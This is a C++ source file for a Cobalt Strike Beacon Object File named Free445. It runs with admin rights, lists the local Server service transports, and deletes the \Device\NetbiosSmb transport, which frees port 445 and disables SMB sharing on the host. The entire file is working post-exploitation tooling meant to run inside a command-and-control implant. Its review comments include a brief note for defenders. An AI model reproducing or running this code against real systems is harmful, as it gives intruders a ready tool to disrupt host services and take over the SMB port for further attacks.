Free445.cpp
#include <windows.h>
#include <Lm.h>
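extern "C" {
#include "beacon.h"

// BOF entry point; receives the packed argument buffer and its length.
void go(char* buff, int len);

// Imports written in the LIBRARY$Function form used by Beacon object files,
// so each symbol is bound to the named DLL when the object is loaded rather
// than through a normal import table. Parameter lists follow the prototypes
// in <Lm.h>.
WINBASEAPI DWORD WINAPI NETAPI32$NetServerTransportEnum(LPWSTR,DWORD,PBYTE*,DWORD,PDWORD,PDWORD,PDWORD);
WINBASEAPI DWORD WINAPI NETAPI32$NetServerTransportDel(LPWSTR,DWORD,PBYTE);
WINBASEAPI DWORD WINAPI NETAPI32$NetApiBufferFree(LPVOID);

// wcscmp returns an int (negative / zero / positive), not a pointer.
// Declaring the wrong return type makes the call site compare a value read
// with the wrong width and type, which is undefined behaviour.
WINBASEAPI int __cdecl MSVCRT$wcscmp(const wchar_t *_lhs,const wchar_t *_rhs);
}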
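/*
 * BOF entry point.
 *
 * Returns early with an error message unless BeaconIsAdmin() reports an
 * elevated context. Otherwise it enumerates the transports bound to the
 * Server service on the local machine (server name NULL, information level 0)
 * with NetServerTransportEnum, prints each transport name, and calls
 * NetServerTransportDel on the entry whose name equals \Device\NetbiosSmb.
 * It finishes by printing how many entries were enumerated.
 *
 * args / alen: packed argument buffer and its length; not used here.
 *
 * Impact and review notes:
 *  - Removing the transport changes a host-wide binding, not per-process
 *    state, and nothing in this function restores it afterwards. Inbound SMB
 *    served over that transport (file and printer sharing) is presumably
 *    unavailable until the binding is re-created -- confirm how and when the
 *    Server service rebinds on the target OS version.
 *  - For defenders: a host that stops answering SMB while the Server service
 *    is still running, or a process other than the system owning the SMB
 *    listener afterwards, is worth investigating. NOTE(review): inferred from
 *    the transport name and the file name, not shown by this code.
 */
void go(char * args, int alen) {
    // The argument buffer is intentionally ignored; the transport is fixed.
    (void)args;
    (void)alen;

    if (!BeaconIsAdmin()) {
        BeaconPrintf(CALLBACK_ERROR, "Sorry, You are not Admin !\n");
        return;
    }

    // A wide string literal is const; binding it to a non-const pointer is
    // ill-formed in C++11 and later.
    const wchar_t* transport = L"\\Device\\NetbiosSmb";

    LPSERVER_TRANSPORT_INFO_0 pBuf = NULL;
    DWORD dwLevel = 0;
    DWORD dwPrefMaxLen = MAX_PREFERRED_LENGTH;
    DWORD dwEntriesRead = 0;
    DWORD dwTotalEntries = 0;
    DWORD dwResumeHandle = 0;
    DWORD dwTotalCount = 0;
    NET_API_STATUS nStatus;
    // LPWSTR matches the declared prototype regardless of the UNICODE macro
    // (LPTSTR would be char* in an ANSI build). NULL selects the local machine.
    LPWSTR pszServerName = NULL;

    do {
        // Level 0 returns an array of SERVER_TRANSPORT_INFO_0 records; the
        // resume handle carries the position across ERROR_MORE_DATA rounds.
        nStatus = NETAPI32$NetServerTransportEnum(pszServerName,
                                                  dwLevel,
                                                  (LPBYTE *)&pBuf,
                                                  dwPrefMaxLen,
                                                  &dwEntriesRead,
                                                  &dwTotalEntries,
                                                  &dwResumeHandle);

        if ((nStatus == NERR_Success) || (nStatus == ERROR_MORE_DATA)) {
            if (pBuf != NULL) {
                LPSERVER_TRANSPORT_INFO_0 pEntry = pBuf;

                for (DWORD i = 0; i < dwEntriesRead; i++, pEntry++, dwTotalCount++) {
                    BeaconPrintf(CALLBACK_OUTPUT, "Found Transport: %ls\n", pEntry->svti0_transportname);

                    if (0 != MSVCRT$wcscmp(pEntry->svti0_transportname, transport)) {
                        continue;
                    }

                    // The enumerated record itself is passed back as the
                    // description of the transport to remove.
                    NET_API_STATUS status = NETAPI32$NetServerTransportDel(pszServerName, dwLevel, (LPBYTE)pEntry);
                    if (NERR_Success == status) {
                        BeaconPrintf(CALLBACK_OUTPUT, "Deleted %ls\n", transport);
                    } else {
                        // NET_API_STATUS is a DWORD (unsigned long): use %lu.
                        BeaconPrintf(CALLBACK_ERROR, "Error %lu while deleting %ls\n", status, transport);
                    }
                }
            }
        } else {
            BeaconPrintf(CALLBACK_ERROR, "A system error has occurred: %lu\n", nStatus);
        }

        // The API allocates the buffer; release it after every round so that
        // nothing is left allocated when the loop exits.
        if (pBuf != NULL) {
            NETAPI32$NetApiBufferFree(pBuf);
            pBuf = NULL;
        }
    } while (nStatus == ERROR_MORE_DATA); // keep going while more entries remain

    BeaconPrintf(CALLBACK_OUTPUT, "Total of %lu entries enumerated\n", dwTotalCount);
}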